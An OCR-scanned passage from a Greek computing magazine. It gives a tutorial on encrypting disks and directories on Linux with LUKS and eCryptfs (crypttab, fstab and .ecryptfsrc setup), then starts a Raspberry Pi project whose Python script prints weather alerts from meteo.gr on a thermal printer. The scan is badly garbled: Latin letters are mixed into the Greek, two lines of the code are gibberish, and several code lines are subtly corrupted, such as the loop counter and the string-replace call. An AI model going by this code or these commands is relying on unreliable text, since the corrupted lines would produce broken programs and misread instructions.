TETOIO, θα ρίξουμε µια ματιὰ σε μερικὲς ακόµα βασικὲς διαδικασίες. 


Ας υποθέσουμε ὁτι ολοκληρώσαμε την εργασία µας στον κρυπτογραφημένο δίσκο 
και ότι για λόγους ασφαλείας θέλουμε να τον αποπροσαρτήσουμε. Προφανώς, για To 
σκοπὀ αυτό θα στραφούμε στο πρόγραμμα umount: 


sudo umount /mnt/encrypted-storage 


Όμως, η παραπάνω ενέργεια δεν αρκεί για την πλήρη προστασία των δεδοµένων. 
Πρέπει και να καταργήσουμε το /dev/mapper/enc_blk_dev, αφού Ooo υπάρχει θα 
παρέχει πρόσβαση στα αποκρυπτογραφημένα δεδομένα του δίσκου. Κάτι τέτοιο ENI- 
τυγχάνεται ως εξής: 


sudo cryptsetup luksClose enc_blk_dev 


Τέλος, κάτι που µπορεί να µας pavzi χρήσιμο όταν διαχειριζόμαστε δίσκους που 
¿xouv κρυπτογραφηθεἰ µε το LUKS, εἶναι η προσθαφαίρεση passphrases. H προσθή- 
Kn νέων passphrases πραγματοποιείται µε τη βοήθεια του cryptsetup: 


cryptsetup luksAddKey /dev/sdb 
Με παρόμοιο τρόπο πραγματοποιείται και η κατάργηση: 
cryptsetup luksRemoveKey /dev/sdb 


Στην πρώτη περίπτωση To cryptsetup θα µας ζητήσει να εισαγάγουµε το νέο 
passphrase, ενώ στη δεύτερη θα µας ζητήσει να δώσουμε εκεῖνο που θέλουμε va 
καταργηθεί. 


Διαδικασία απόσυρσης 


Πα την πρόσβαση στα δεδοµένα ενὸς δίσκου που ἐχει κρυπτογραφηθεἰ µε TO 
LUKS απαιτεῖται το αντίστοιχο passphrase. Όπως τονἰσαμε, ὅμως, τα δεδομένα 
δεν κρυπτογραφούνται µε TO passphrase. Η κρυπτογράφηση πραγματοποιείται 
µε το λεγόμενο master key, το οποίο βρίσκεται αποθηκευμένο (σε κρυπτογρα- 
φημένη μορφὴ) µέσα στο LUKS header. To passphrase αποτελεὶ απλὰ ¿va μέσο 
για την απὀκτηση του master key. Ano τα παραπάνω συνεπάγεται ότι η διαγραφἠ 
του LUKS header αποτελεὶ κἰνηση ματ - τόσο προς τους επἰδοξους κατάσκο- 
πους, ὁσο και προς τον εαυτὸ µας. To passphrase θα εἶναι πλέον ἄχρηστο. Ας 
υποθέσουμε λοιπὀν ὁτι ἐχουμε κρυπτογραφήσει vav δίσκο µε το LUKS και kå- 
ποια στιγµἠ αποφασίζουμε να του αλλάξουμε χρήση, να τον πουλήσουμε ἡ απλά 
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Αυτόματη προσάρτηση 


Το LUKS αποτελεἰ τμήμα του πυρήνα εδὠ και αρκετά χρόνια και δεν διακρίνεται μόνο 
για τις αυξημένες επιδόσεις του. Απολαμβάνει και ευρεία υποστήριξη ano ὀλες τις 
διανομὲς και ano πάρα πολλὲς εφαρμογές. Για παράδειγµα, αν κρυπτογραφήσουμε 
ἑνα δίσκο µε το LUKS, το σχετικὀ block device εμφανίζεται αυτόματα στο μενού 
places του GNOME, ὁπως επίσης και στο side-pane του Nautilus. H δε προσάρτηση 
πραγµατοποιεἶται µε Eva απλὸ κλικ, ενὠ για την εισαγωγἠ του passphrase εμφα- 
vietai αυτόματα Eva πλαίσιο διαλόγου! Υπάρχουν ὁμως και περιπτώσεις που όλες 
αυτὲς οι ευκολίες εἶναι άχρηστες. Σκεφτείτε, για παράδειγµα, την περίπτωση ενὸς 
file server που δεν σηκώνει παραθυρικὀ περιβάλλον ñ, ακόµα χειρότερα, EVA μικρὸ 
VPS. E, λοιπὀν, η εὐκολη προσάρτηση των κρυπτογραφημένων μέσων μπορεὶ να 
εξασφαλιστεί και σε αυτά τα συστήματα. Mwc θα σας φαινόταν αν αρκούσε να δώ- 
σετε το απαιτούμενο passphrase κατὰ το boot του συστήματος και η προσάρτηση 
να ολοκληρωνόταν αυτόματα; 


Πα va υλοποιήσουμε τον παραπάνω αυτοματισμὀ, πρέπει να δημιουργήσουμε το 
αρχείο ρυθμίσεων crypttab εντὸς του καταλόγου /etc. Σε αυτό το αρχείο προσδι- 
ορἰζουμε τις κρυπτογραφημένες συσκευὲς και παρέχουμε ορισμένα δεδομένα που 
απαιτούνται για τη δηµιουργία των block devices, τα οποία θα παρέχουν πρόσβαση 
στα αποκρυπτογραφηµμένα δεδομένα. Όπως υποψιάζεστε, το εν λόγω αρχείο αξι- 
οποιεἶται ano το υποσύστημα dm-crypt του πυρήνα. Με τη βοήθεια του crypttab 
μπορούμε να αυτοματοποιήσουμε αρκετὲς απὸ τις εργασίες που πραγματοποιεί το 
cryptsetup. Ας δούµε πὠς πρέπει να συμπληρώσουμετο εν λόγω αρχείο, ENEKTEIVO- 
ντας το παράδειγµα που μελετήσαμε νωρίτερα. Αρχικά, δημιουργούμε το crypttab 
και το ανοίγουμε προς επεξεργασία: 


sudo nano /etc/crypttab 
Κατόπιν προσθέτουμε την ακὀλουθη γραμμὴ: 
vault /dev/sdb none luks 


Όπως βλέπετε, η γραμμή χωρίζεται σε τἐσσερα τμήματα. Το πρὠτο αναφέρει το 
ὀνομα του νέου block device που θέλουμε να δημιουργηθεί. Το δεύτερο τµήµα προσ- 
διορίζει την κρυπτογραφημένη συσκευἠ. Εκεί, αντί για το ὀνομα Tou device file θα 
μπορούσαμε να εἰχαμε δώσει το UUID του δίσκου. Μήπως αναρωτιέστε πώς θα το 
βρίσκαμε; O πιο εὔκολος τρόπος εἶναι µε τη βοήθεια του προγράµµατος Isblk, η χρή- 
ση του οποίου ξεφεύγει ano το θέμα µας. Μπορείτε να ρἰξετε µια ματιά στο σχετικὀ 
man page και εἶμαστε σίγουροι ὁτι θα καταλάβετε αμέσως πώς λειτουργεί. Στην Tpi- 
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τη περιοχἠ της παραπάνω γραμμὴς τοποθετείται το αντἰστοιχο passphrase. Χρησι- 
μοποιώντας τη λέξη none σε αυτό το σημείο, υποχρεώνουμε το σύστημα να παγώσει 
οποιαδήποτε ἄλλη ενέργεια πραγματοποιεί και να ζητήσει το passphrase ano το xph- 
στη. H τέταρτη και τελευταία περιοχἠ της γραμμἠς προορἰζεται για την παράθεση 
μερικῶν ρυθμίσεων µε τη μορφή λίστας. Ωστόσο, στην περίπτωση των αποθηκευτι- 
κὠν μέσων που ¿xouv κρυπτογραφηθεἰ με TO LUKS, δεν προβλέπεται καμία ρύθμιση. 
Ακριβώς γι' αυτό, στη συγκεκριμένη θέση έχουμε εισάγει μόνο την ειδικἠ λέξη luks. 
Εφόσον ολοκληρώσουμε τη συμπλήρωση του crypttab πρέπει να ενημερώσουμε TO 
σύστημα για TIG αλλαγὲς και, κυρίως, να προσθέσουμε στο initramfs την απαραίτητη 
λειτουργικότητα: Τη δυνατότητα να διακόπτεται το boot και το σύστημα να ζητά ano 
το χρήστη την εισαγωγἠ του passphrase. Πα το σκοπὸ αυτό απαιτούνται ορισμένα 
scripts που διανέμονται µε το πακέτο cryptsetup. Το επὀµενο βήμα, λοιπὀν, εἶναι η 
προσθήκη του σχετικού πακέτου: 


sudo apt-get install cryptsetup 


Σε αυτὸ το σηµείο ενδἐχεται να διαµαρτυρηθείἰτε! Ποιος ο λὀγος να προσθέσουμε 
το πακέτο cryptsetup, εφόσον το ομώνυμο εργαλείο υπάρχει Non στο σύστημα; 
H απάντηση εἶναι αρκετά απλή: AUTÒ που υπάρχει εξ ορισμού στις περισσότερες 
διανομὲς εἶναι το εκτελέἑσιµο (binary) cryptsetup και ὀχι τα συνοδευτικά scripts ;) 
Εφόσον εγκαταστήσουµε το πακέτο, πρέπει να προχωρήσουμε στην ενηµέρωση του 
initramfs: 


update-initramfs -u -k all 


Σημειώστε ὁτι η παραπάνω ενέργεια πρέπει να εκτελείται μετὰ απὀ κάθε τροποποἱ- 
non του crypttab. Μετά ano αυτό To βήμα απομένει Eva ακόμα, που λογικἁ θα σας 
pavesi περισσότερο οικείο απὀ κάθε ἄλλο. Πρέπει να προσθέσουμε µια κατάλληλη 
γραμμὴ εντὸς του αρχείου fstab, για να πετύχουμε την αυτόματη προσάρτηση του 
block device µε τα κρυπτογραφημένα δεδομένα. Στο παράδειγµα που εξετάζουμε, 
αρκεί να ανοἰξουµε το /etc/fstab και να προσθέσουμε κάτι TETOIO: 


/dev/mapper/vault /mnt/vault ext4 auto,user,rw,errors=remount-ro © ϐ 


Napatnpnote TI στο τέταρτο πεδίο της παραπάνω γραμμὴς ἐχουμε συμπεριλάβει 
την επιλογἠ user. Έτσι εξασφαλἰζουµε ὁτι η προσάρτηση κι αποπροσάρτηση του 
σχετικού block device θα εἶναι δυνατή ano όλους τους χρήστες - χωρίς τη χρήση 
του sudo. Σε Eva σύστημα µε μοναδικὀ χρήστη τον εαυτὀ µας, κάτι τέτοιο αυξάνει 
την ευκολία ακόµα περισσότερο ;) 


Κρυπτογράφηση καταλόγων 


Στο ξεκίνημα του ἄρθρου μιλήσαμε και για To eCryptfs. Μη νομίζετε ὁτι το ξεχάσαμε, 
οὐτε OT! θα ἦταν περιττή η παρουσἰασἡ του, μετὰ and ὁσα προηγἠθηκαν. Το σενὰ- 
plo που μελετήσαμε μέχρι τώρα παρουσιάζει αρκετὀ ενδιαφέρον, αλλά OUTE NOPE, 
οὐτε θα εἶχε νόημα να εφαρμοστεί σε κἆθε περίπτωση. Αν ο ὀγκος των δεδομένων 
που θέλουμε να κρυπτογραφήσουμε εἶναι μικρὸς, η αφιέρωση ενὸς δίσκου ἡ µιας 
κατάτµησης για τα κρυπτογραφημένα δεδομένα θα συνιστούσε σπατάλη. Εξάλλου, 
όταν δεν συντρέχουν ειδικοὶ λόγοι, η κρυπτογράφηση ολόκληρου του συστήματος 
ξοδεύει ανώφελα τη διαθέσιμη επεξεργαστικἡ ισχύ και εισάγει περιττἐς καθυστερἠ- 
σεις. Ας εξετάσουμε λοιπὸν κι Eva απλούστερο σενάριο, κατἁ το οποίο θέλουμε να 
κρυπτογραφήσουμε λίγα μόνο αρχεία. Σε αυτή την περίπτωση αρκεί να κρυπτογρα- 
φήσουμε ¿vav κατάλογο, εντὸς του οποίου θα τοποθετούμε τα ευαἰσθητα δεδομένα. 
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Πα auth τη δουλειὰ θα αξιοποιήσουµε το eCryptfs. Όπως ἐχουμε πει, ο κὠδικας του 
συγκεκριμένου filesystem βρίσκεται ἠδη στον πυρήνα. Ωστόσο, για το χειρισμὸ του 
απαιτούνται κάποια εργαλεία nou δεν συγκαταλέγονται στον "standard" εξοπλισμὸὀὸ 
των διανομών. Το πρώτο βήμα, λοιπὸν, εἶναι να εγκαταστήσουµε το σχετικὀ πακέτο: 


sudo apt-get install ecryptfs-utils 


τώρα μπορούμε να δημιουργήσουμε Tov κατάλογο που σκοπεύουµε να κρυπτογρα- 
φήσουμε και να του δώσουμε τα κατάλληλα δικαιώματα: 


mkdir /home/pvar/vault 
chmod 700 /home/pvar/vault 


Σημειώστε ὁτι για την εκτέλεση των παραπάνω δεν χρησιμοποιήσαμε το sudo. O 
κατάλογος που φτιάχνουμε θέλουμε να ανήκει στο δικὀ µας λογαριασμὀ και ὀχι σε 
εκεῖνον του root. Με αυτόν τον τρὀπο θα ἐχουμε πλήρη πρόσβαση στο περιεχόµε- 
vo του κρυπτογραφημένου καταλόγου, χωρίς να εκτελούμε κάθε λἰγο και λιγάκι 
ΤΟ sudo. Στη συνέχεια, µε τη χρήση του chmod εξασφαλίζουµε OT! μόνον εμεὶς θα 
έχουμε πρὀσβαση στο συγκεκριμένο κατάλογο και κανένας ἄλλος. Αυτή η κίνηση, 
όμως, ενδέχεται να δημιουργήσει µια απορἰα: Ποιος ο λόγος va απαγορεύσουμε την 
πρὀσβαση στο συγκεκριµένο κατάλογο, εφόσον τα περιεχὀμενὰ του θα εἶναι Kpu- 
πτογραφημένα; Αυτή η anopia θα λυθεί μόνο ὁταν μελετήσουμε το τελευταῖο στάδιο 
της εργασίας µας: 


sudo mount -t ecryptfs /home/pvar/vault /home/pvar/vault 


Στην παραπάνω γραμμή συμπυκνώνονται ὁλες οι ιδιαιτερότητες του eCryptfs. Ka- 
ταρχάς, για τη χρήση του πρέπει να επιστρατεύσουμε το προγραμματάκι mount, 
ὁπως και µε κάθε ἀλλο filesystem. Μόνο που το eCryptfs *dev* µπορεί να προσαρ- 
τήσει ολόκληρες κατατμήσεις. Μην ξεχνάτε ὁτι πρὀκειται για Eva stacked filesystem 
κι ως εκ τούτου, λειτουργεί μόνο πάνω ano κἀποιο υπάρχον filesystem. Τελικά, µε 
το eCryptfs μπορούμε va προσαρτούμε αποκλειστικἁ και μόνο καταλόγους. Εδὠ 
όμως χρειάζεται λίγη προσοχή: Το eCryptfs μπορεί να προσαρτήσει ¿vav κατάλογο 
πάνω στον ἰδιο του τον εαυτὀ! Έτσι, για ὁσο ισχύει η προσάρτηση, τα περιεχόμενα 
του καταλόγου εμφανίζονται αποκρυπτογραφημένα. Όταν ὁμως καταργείται η npo- 
σάρτηση, τα περιεχόμενα εμφανίζονται στην κρυπτογραφηµένη τους μορφή. Στην 
πραγματικότητα, ὅταν προσαρτούµε ἑναν κατάλογο µε το eCryptfs, οτιδήποτε TO- 
ποθετούμε μέσα TOU καταλήγει να γραφτεἰ στο δίσκο σε κρυπτογραφημένη µορφή. 
Ωστόσο, ὀταν ο κατάλογος εἶναι προσαρτηµένος και προσπαθούμε να τον προσπελὰ- 
σουµε, To eCryptfs παρεμβαίνει και αποκρυπτογραφεἰ τα πάντα αυτομάτως. 


Ελπίζουμε τώρα να λύθηκε και η απορἰα που προἐκυψε νωρίτερα. Τροποποιήσαμε τα 
δικαιώματα του καταλόγου vault προς το αυστηρότερο, γιατὶ ὁταν θα εἶναι προσαρ- 
τημένος τα περιεχόμενα του θα εμφανίζονται αποκρυπτογραφημένα. Αν η προσάρ- 
τηση του καταλόγου vault γινόταν σε κάποια ἄλλη θέση και OX! πάνω στον ἰδιο του 
τον εαυτὀ, τότε ο ἴδιος ο κατάλογος θα εμφανιζόταν πάντοτε κρυπτογραφημένος. 
Όποιος χρήστης του συστήματος εἶχε την περιέργεια να τον ψαχουλέψει, δεν θα 
έβλεπε ποτὲ KATI χρήσιμο. Σε GUTH την περίπτωση, για να κρατήσουμε μακριὰ τα 
αδιάκριτα βλέμματα, θα ἐπρεπε να τροποποιήσουμε τα δικαιώματα πρὀσβασης του 
ἄλλου καταλόγου -- εκείνου στον οποίο θα γινόταν η προσάρτηση ;) 
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Γρηγορότερη προσάρτηση 


Κάθε φορά που πραγματοποιούµε την προσάρτηση ενὸς κρυπτογραφημένου KaTa- 
λόγου, το eCryptfs μὰς απευθύνει μερικὲς ερωτήσεις. Για παράδειγµα, ρωτάει ποιος 
αλγόριθμος θέλουμε να χρησιµοποιηθεί για την κρυπτογράφηση και την αποκρυπτο- 
γράφηση, ζητάει To passphrase κ.ά. Το περιεχόμενο των ερωτήσεων εἶναι απόλυτα 
κατανοητὀ kal δεν θα δυσκολέψει κανέναν. Ωστόσο, η υποχρέωση να απαντάµε στις 
ίδιες ερωτήσεις ξανὰ και ξανά, εἶναι σίγουρο OT! θα μὰς κουράσει πολύ γρήγορα. Πα 
να επιταχύνουμε τη διαδικασία της προσάρτησης, μπορούμε να δημιουργήσουμε Eva 
αρχείο ρυθµἰσεων για το eCryptfs κι and εκεἰ να απαντήσουμε σ' όλες τις (ενοχλη- 
TIKEC) ερωτήσεις. Στο παράδειγμα που εξετάσαμε το eCryptfs χρησιµοποιείται µε τη 
βοήθεια Tou sudo και ἆρα ano τον χρήστη root?. Επομένως, το αρχείο ρυθμίσεων 
πρέπει να δημιουργηθεί στο home directory Tou root: 


sudo nano /root/.ecryptfsrc 
Μέσα στο αρχείο πρέπει να προσθέσουµε τα ακόλουθα: 
key=passphrase 
ecryptfs_sig=signature 
ecryptfs_cipher=aes 
ecryptfs_key_bytes=16 
ecryptfs_passthrough=n 
ecryptfs_enable_filename_crypto=y 


Ουσιαστικά, καθεμία ano τις παραπάνω γραμμὲς απαντά σε μία απὀ τις ερωτήσεις 
του eCryptfs. Σημειώστε OT! στην πρώτη γραμμή δεν πρέπει να αντικαταστήσουμε 
τη λέξη passphrase με το ἴδιο το συνθηµατικὀ μας. H συγκεκριμένη λέξη επιδέχεται 
ειδικἠς ερμηνείας και θα υποχρεώσει το eCryptfs να µας ζητήσει το passphrase κατὰ 
την προσάρτηση του καταλόγου. Αυτή εἶναι και η μοναδική ερώτηση που θα µας 
απευθύνει! Στη δεύτερη γραμμή ωστόσο, θα πρέπει να αντικαταστήσουμε τη λέξη 
signature µε µια ειδικἠ δεκαεξαδικἠ τιµή, που παράγεται κατὰ την πρώτη προσάρ- 
τηση του κρυπτογραφημένου καταλόγου. Αυτἠ την τιµή θα την βρούμε στο αρχείο 
/root/.ecryptfs/sig-cache.txt. Ενδιαφἐρον παρουσιάζει και η τελευταία γραμμή των 
ρυθμίσεων, ONOU έχουμε επιβάλλει την κρυπτογράφηση των ονομάτων των αρχείων 
μας. Σύμφωνα µε τις εργοστασιακὲς ρυθμίσεις, βλέπετε, το eCryptfs κρυπτογραφεἰ 
μόνο το περιεχόμενο των αρχείων και OXI τα ονόματά τους. Δεν ξέρουμε για σας, 
αλλά σε µας δεν ἄρεσε αυτό. Μετά τη συμπλήρωση και την αποθήκευση του αρχείου 
/root/.ecryptfsrc, ακολουθεί µια μικρἠ προσθήκη στο αρχείο fstab. Εκεἰ αρκεἰ να 
προσθέσουμε KATI τέτοιο: 


/home/pvar/vault /home/pvar/vault ecryptfs noauto 0 @ 


Νομίζουμε ὁτι η παραπάνω γραμμὴ δεν χρειάζεται επεξήγηση. Αφού αποθηκεύσουµε 
και To fstab, θα μπορούμε να προσαρτούμε τον κρυπτογραφημένο κατάλογο δίνο- 
ντας κάτι τέτοιο: 


sudo mount /home/pvar/vault 


Πλέον, OX! μόνο θα πληκτρολογούμε κάτι πιο σύντομο, αλλά θα απαντάμε και σε 
λιγότερες ερωτήσεις: Θα αρκεἰ να δίνουμε TO passphrase. 


2. Στην πραγματικότητα μπορεί να χρησιμοποιηθεί and οποιονδήποτε χρήστη, αλλά κάτι τέτοιο προὐποθέτει την επέμβαση στις ρυθμίσεις του 
ΡΑΜ. 
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Ατελεἰίωτες ευκολίες 


Το eCryptfs, σε αντίθεση µε To LUKS, δεν δημιουργεί κἄποιο header για την 
αποθήκευση των παραμέτρων της κρυπτογράφησης. ΟΙ σχετικές πληροφορίες 
(cryptographic metadata) αποθηκεύονται σε κάθε κρυπτογραφημένο αρχείο ξεχω- 
ριστὰ! Αυτή η προσέγγιση µπορεἰ να εἶναι ελαφρώς σπάταλη, αλλά προσφἑρει δύο 
τεράστιες ευκολίες. Κατ' αρχάς, κάθε αρχείο εντὀὸς του κρυπτογραφηµένου καταλὀ- 
you εἶναι εντελώς ανεξάρτητο ano τα υπόλοιπα, ὁπως KI απὀ τον κατάλογο. AUTÒ 
σημαίνει ὁτι μπορούμε να αντιγράψουμε Eva αρχείο σε κάποιον ἄλλον υπολογιστή 
και, χωρίς να μεταφέρουμε ἄλλες πληροφορίες ἡ ρυθμίσεις, θα μπορούμε να το 
αποκρυπτογραφήσουµε χρησιμοποιώντας το ἴδιο passphrase. Επιπρόσθετα, εφόσον 
κάθε αρχείο παρουσιάζει αυτή την αυτοτέλεια, μπορούμε να διατηρούμε incremental 
backups. Εφόσον γνωρίζουμε το passphrase, τα αρχεία Tou backup θα μπορούν va 
αποκρυπτογραφηθούν κανονικἀ, avd πάσα στιγμὴ και σε οποιοδήποτε σύστημα. Πα 
να κατανοήσετε τη μεγάλη αξία αυτἠς της ευκολίας, σκεφτείτε ὁτι στην περίπτωση 
που ἐχουμε κρυπτογραφήσει Evav ολόκληρο δίσκο pe TO LUKS, κάθε backup θα ἐχει 
το ἰδιο μέγεθος µε το δίσκο. 


Αν μετά ano ὁσα εἶπαμε δεν συγκινηθήκατε καθόλου, σὰς έχουμε pia ἐκπληξη. Το 
πακέτο ecryptfs-utils περιλαμβάνει ἑνα script µε το ὀνομα ecryptfs-migrate-home. 
Όπως καταλαβαίνετε, πρὀκειται για Eva script που κρυπτογραφεἰ ολόκληρο το home 
directory ενὸς χρήστη και πραγματοποιεί ὀλες τις απαραίτητες ρυθμίσεις, ὥστε η 
αποκρυπτογράφηση να πραγματοποιείται αυτόματα κατὰ τη διαδικασία της σύνδε- 
σης (login). Αν αποφασίσετε να χρησιμοποιήσετε αυτό το εξαιρετικὀ script, σημειώ- 
στε ὁτι εἶναι φρόνιμο να το εκτελέσετε απὀ το λογαριασμὀ του root. Επιπρὀσθετα, 
Φροντίστε να µην τρέχει καμία διεργασία ano το λογαριασμὀ σας (και µην ξεχάσετε 
να κάνετε logout ano τα X). Αυτό εἶναι απαραίτητο, ὥστε ὁσο διαρκεἰ η κρυπτογρά- 
φηση να µην πραγµατοποιηθεἰ καμία τροποποίηση στα αρχεία σας. Περιττό να σας 
πούμε ὁτι εµεἰς εγκαταστήσαμε το πακέτο ecryptfs-utils σε όλα τα συστἠματὰ µας 
και στη συνέχεια σπεύσαμε να εκτελέσουμµε κάτι τέτοιο: 


# ecryptfs-migrate-home -u pvar 


Μη µας βλέπετε ETO! εμάς, καλὰ παιδιά, δηλαδή: Έχουμε πολλά μυστικά να κρύψου- 
με... ;) 
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Ἐκτακτα δελτία καιρού ano το Raspberry Pi [μέρος 20] 


H υπερσύγχρονη κατασκευή που θα εκτυπώνει τα μηνύματά της σε µια στενἠ 
λωρίδα χαρτιού εἶναι σχεδὀν ἐτοιμη! Θα μπορούσε να ἐχει ξεπηδήσει ano κἄποιο 
µυθιστόρηµα επιστηµονικἠς φαντασίας του 19ου αιώνα, αλλά γεννήθηκε ano τη δικἠ 


μας (παιχνιδιάρικη) φαντασία και την ατελείωτη ὀρεξη για κατασκευές :D 


Έκτακτα δελτία καιρού από to Raspberry Pi [µέρος 2ο] 
ιά 


Στο πρῶτο μέρος του ἄρθρου, που αρχίζει ano τη σελίδα 14, αναφερθήκαμε στους 
κλασικούς τρόπους σύνδεσης των θερµικὠν εκτυπωτών µε vav υπολογιστή και ειδι- 
κότερα µε TO Raspberry Pi. Ακολούθως εγκαταστήσαμε το απαραἰτητο λογισμικό για 
το χειρισμὸ του δικού µας εκτυπωτή µε τη βοήθεια της γλὠσσας Python, ενώ ppo- 
ντίσαµε να πάρουμε KI va μέτρο για τη θωράκιση του συστήµατος: Εξασφαλἰσαµε 
ότι οι απλοἰ χρήστες του συστήµατος θα ἐχουν πλήρη πρόσβαση στις λειτουργίες 
του εκτυπωτή, επομένως η εκτύπωση μηνυμάτων δεν θα απαιτεὶ τα δικαιώματα του 
χρήστη root. Αυτό κρίθηκε σημαντικὸὀ γιατί το πρόγραµµα που θα τυπώνει τις εἰδο- 


ποιήσεις 


εἰσοδος δεν μπορεί να θεωρηθεί (και οὐτε εἶναι) αξιόπιστη, πρέπει να EKTEAEITAI µε 
τα ελάχιστα δυνατὰ δικαιώματα. Αφού ξεμπερδέψαμµε και μ' αυτό το ζήτημα, ppo- 
ντίσαµε να ξεκαθαρίσουµε ορισμένες λεπτομέρειες σχετικἁ µε τον τρὀπο λειτουρ- 
γίας του προγρἀμματὸὀς µας. Σε αυτὸ το μέρος θα δούμε (επιτἐλους) τους καρπούς 
αυτής της ενδελεχούς προετοιμασίας. Στη συνέχεια παραθέτουμε τον κὠδικα που 
γράψαμε, αλλά έχετε υπόψη ὁτι µπορείτε να τον κατεβάσετε κι απὀ το http://bit. 


θα αντλεἰ δεδομένα απὀ το δίκτυο. Ένα τέτοιο πρὀγραμμα, του οποίου η 


ly/dhe39metrep. k" " 
001 #! /usr/bin/env python 
002 # -*- file encoding: utf-8 -*- 
063 
064 ἡ Meteo Reporter - deltaHacker Magazine - v.1.0 
0605 # Copyright (c) 2014, Petros Kyladitis 
006 # 
007 # Prints reports for hazardous weather conditions, predicted from meteo.gr, 
068 ἡ at EPSON thermal printers, connected via USB. 
009 ἡ 
010 ἡ This is free software, distributed under the GNU GPL 3 
611 
012 import re, urllib 
013 from escpos import * 
614 
015 ----- options section start ----- 
016 ΜΙΝ ΤΕΜΡ = 3 
617 ΜΑΧ ΤΕΜΡ = 37 
018 MAX_WIND_SPEED = 7 
@19 HAZARD_CONDITIONS = ["XIONOPTOSI", "KATAIGIDA" ] 
020 CITY = "ΧΙΟΣ" 
θ21 URL = "http://meteo. gr/m/m-cf.cfm?city_id=11&ProvinceID=8" 
022 PRINTER_TYPE = "USB" #valid options: "USB", "SERIAL", "νετ" 
023 USB _PRINTER_VENDOR_ID = θχθ4ρ8 
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024 USB PRINTER _PRODUCT_ID = θχθεθβ 
025 NETWORK_PRINTER_IP = "192.168.1.99" # we don't care about this 
026 SERIAL_PRINTER_PORT = "/dev/tty@" # we don't care about this 


027 # ----- options section end ----- 

028 

029 def strip_tags(html1): 

030 return re.sub('<[*%<]+?>', '', html) 

031 

032 def el_to_lat(text): 

033 eles Ga Bing aya O ε ο Τη 0." E K o A a V EA 


3 2 
πι ο ο αν ο ο Παρ Νο ΞΕ On Mo Ra Bion Πα ο 5 OX 
Ὅν. ου, πανὶ Ὁ," ο ον Ε 
Ποπ ΟΥ ος) 
034 lat = ο ορ ρα ο Ze ΕΠΣ πο ks yeas cole ge Moses: 


3 ο, p 3 Piy 5 3 t 3 Μορ a Σε ο ο Ὁ ο ο 1B" g G 3 Ds E 3 
σι a THY, a a 1h", μι (NY, KS", O p aR τοι 7", (N's: 


Εν exer yee Seen Ohes a Sie, Be ο ο νο ο ty ey ο... 
ΑΠΕ ο ο γα) 

035 dic = dict(zip(el, lat)) 

036 

037 for i, j in dic.iteritems(): 

038 text = text.replace(i, 1) 

039 return text 

040 

041 def main(): 

042 opener = urllib.FancyURLopener({}) 

043 f = opener.open(URL) 

044 content = f.read() 

045 start = content.find(CITY) + len(CITY) 

046 end = content.find( "<style>", start) 

047 htmltext = content[start:end] 

048 plaintext = strip_tags(htmltext) 

049 plaintext = plaintext.replace(" &deg;C", "*C") 

050 plaintext = plaintext.replace(" μποφόρ", ΒΕ") 

651 lines = plaintext.splitlines(True) 

052 listedlines = [] 

053 
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054 for line in lines: 

055 line = line.strip() 

056 if line ΙΞ 

057 listedlines.append( line) 

058 

059 i=0 

060 printline = "" 

061 printdoc = “" 

062 forecast- [Poe |] = 5 

063 

064 for listedline in listedlines: 

065 forecast[i] = el_to_lat(listedline).upper() 

066 

067 if i == 

068 to_be_printed = False 

069 

070 if int(forecast[2][@:forecast[2].find("*")]) <= ΜΙΝ ΤΕΜΡ 
or int(forecast[2][0:forecast[2].find("^")]) >= MAX_ 
TEMP: 

071 to_be_printed = True 

072 

073 if forecast[3] in HAZARD_CONDITIONS: 

074 to_be_printed = True 

075 

076 if int(forecast[4][:forecast[4].find("*")]) >= MAX_ 
WIND_SPEED: 

077 to_be_printed = True 

078 

079 if to_be_printed == True: 

080 for forecastItem in forecast: 

081 printline = printline + " " + forecastItem 

082 printdoc = printdoc + printline.strip() + "\n" 

083 

084 printline = "" 

085 i=@ 

086 else: 
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087 i=i+i 

088 

089 if printdoc != "": 

090 Epson = None 

091 if PRINTER_TYPE == “USB”: 

092 Epson = printer.Usb(USB_PRINTER_VENDOR_ID,USB_PRINTER_ 

PRODUCT_ID) 

093 elif PRINTER_TYPE == "ΝΕΤ": 

094 Epson = printer.Network(NETWORK_PRINTER_IP) 

095 else: 

096 Epson = printer.Serial(SERIAL_PRINTER_PORT) 

097 Epson.set("LEFT-, “Av, “Be, 1, 1) 

098 Epson.text("## HAZARDOUS WEATHER REPORT FOR " + el_to_ 
lat(CITY) + " ##\n") 

099 Epson.text(printdoc) 

100 Epson.text("\n## END OF THE REPORT ##\n") 

101 Epson.cut() 

102 

103 exit() 

104 

105 if _name == "_ main": 

106 main() 


Ας προχωρήσουμε τώρα στην KAGOIKN ανάλυση του κὠδικα, γραµµή προς γραμμὴ. 


Γραμμές 16 ἕως 26. Edm έχουμε Eva μπλοκ δηλώσεων για ορισμένες μεταβλητές 
που ρυθμίζουν τη συμπεριφορά του προγράμματος. Στις πρῶτες δύο γραμμὲς opi- 
ζουμε τη "φυσιολογική" περιοχἠ τιμῶν για τη θερμοκρασία. Όταν η πρὀγνωση ava- 
φέρει θερμοκρασίες ἐξω απὀ αυτή την περιοχή, το πρὀγραμμα θα θεωρεἰ OT! πρὸ- 
κειται για κἄποιο ακραἰο καιρικὀ φαινόμενο και θα τυπώνει τη OXETIKN ειδοποίηση. 
Ακολουθεί ο ορισμὀς μίας μεταβλητής µε παρόμοια λειτουργία, η οποία ωστόσο θα 
χρησιμοποιείται σαν ἄνω ὁριο για την ταχύτητα του ανέμου. H επόμενη μεταβλητή 
χρησιμοποιείται κι αυτὴ για τον εντοπισμὀ των επικίνδυνων καιρικὠν φαινομένων 
και µπορείτε να καταλάβετε εὐκολα τη λογική µε την οποία την ἐχουμε ορίσει. AUTO 
που µπορεἰ να σας προκαλέσει εντύπωση εἶναι το γεγονὸς OTI οι λέξεις που ἐχουμε 
δώσει σαν τιµή στη συγκεκριμένη μεταβλητή εἶναι γραμμένες σε greeklish. Αυτό 
συμβαίνει γιατὶ, ὀπως θα δούμε στη συνέχεια, το πρὀγραμμµα μεταφράζει όλα τα 
εισερχόμενα δεδομένα σε greeklish και µετά πραγματοποιεί τους ελέγχους και την 
όποια εκτύπωση. Στις γραμμὲς 20 και 21 δίνουμε το ὀνομα της περιοχἠς για την 
οποία λαμβάνουμε τις προγνώσεις, ὁπως επἰσης και TO OXETIKO URL. Σημειώστε OT! 
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το ὀνομα της τοποθεσίας εἶναι γραμμένο 
HE ελληνικούς χαρακτήρες και συγκεκρι- Άλειες 

ῃ ' η ΠῚ N ete‘: 
μένα µε κεφαλαἰα γράμματα, αφού ¿TOI SA 
εμφανίζεται και στις σελίδες HTML που 
